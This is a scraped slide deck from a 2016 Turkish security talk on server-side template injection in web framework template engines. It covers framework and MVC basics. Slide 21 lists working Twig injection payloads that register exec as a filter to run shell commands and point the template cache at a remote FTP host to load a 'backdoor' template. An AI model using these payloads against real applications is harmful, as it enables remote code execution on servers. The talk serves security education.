Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

570 visualizaciones

Publicado el

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

Publicado en: Ingeniería
  • Sé el primero en comentar

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

  1. 1. Web Çatı Şablonlarının Güvenliği (SSTI) Ömer Çıtak Özgür Web Teknolojileri Günleri 2016 - www.ozgurwebgunleri.org.tr www.omercitak.com
  2. 2. whoami Security Researcher @ Netsparker Ltd. Developer @ Geri kalan zamanlarda Writer @ Ethical Hacking “Offensive & Defensive” Book Blog: omercitak.com All Social Platform: @Om3rCitak
  3. 3. quesitions 1. Asp.net or PHP?
  4. 4. quesitions 1. Asp.net or PHP? 2. Asp or Laravel?
  5. 5. quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty?
  6. 6. quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty? 4. Smarty or Asp?
  7. 7. quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty? 4. Smarty or Asp?
  8. 8. why using framework?
  9. 9. why using framework? ● Spaghetti Code (functions.php) :P
  10. 10. why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart
  11. 11. why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs
  12. 12. why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs ● Much of the code in less time
  13. 13. why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs ● Much of the code in less time ● MVC or other models
  14. 14. why using framework?
  15. 15. what is the MVC?
  16. 16. what is the MVC?
  17. 17. what is the MVC?
  18. 18. what is the VIEW layer?
  19. 19. what is the VIEW layer? Template Engines; ● Twig ● Smarty ● Blade ● Volt ● Mustache ● etc...
  20. 20. twig ● registerUndefinedFilterCallback(“function_name”) ● getFilter(“filter”) ● setCache(“ftp://omercitak.com:21”) ● loadTemplate(“backdoor”)
  21. 21. exploit ● {{_self.env.registerUndefinedFilterCallback(“exec”)}} ● {{_self.env.getFilter(“ls”)}} ● {{_self.env.setCache(“ftp://omercitak.com:21”)}} ● {{_self.env.loadTemplate(“backdoor”)}}
  22. 22. demo
  23. 23. questions
  24. 24. thanks www.omercitak.com All Social Platform: @Om3rCitak

×